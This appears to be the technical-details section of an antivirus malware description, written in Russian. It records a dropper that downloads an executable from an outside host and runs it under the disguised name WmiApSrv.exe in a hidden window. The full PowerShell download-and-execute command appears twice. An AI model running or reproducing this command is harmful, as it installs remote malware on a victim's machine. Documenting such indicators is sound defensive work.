Техническая информация
- https://a.vidga.me/ypwxqa.exe как %localappdata%\wmiapsrv.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('https://a.vidga.me/ypwxqa.exe','%LOCALAPPDATA%\WmiApSrv.exe');Start-Process '%LOCALAPPDATA%\WmiApSrv.exe'
- DNS ASK a.##dga.me
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('https://a.vidga.me/ypwxqa.exe','%LOCALAPPDATA%\WmiApSrv.exe');Start-Process '%LOCALAPPDATA%\WmiApSrv.exe'' (со скрытым окном)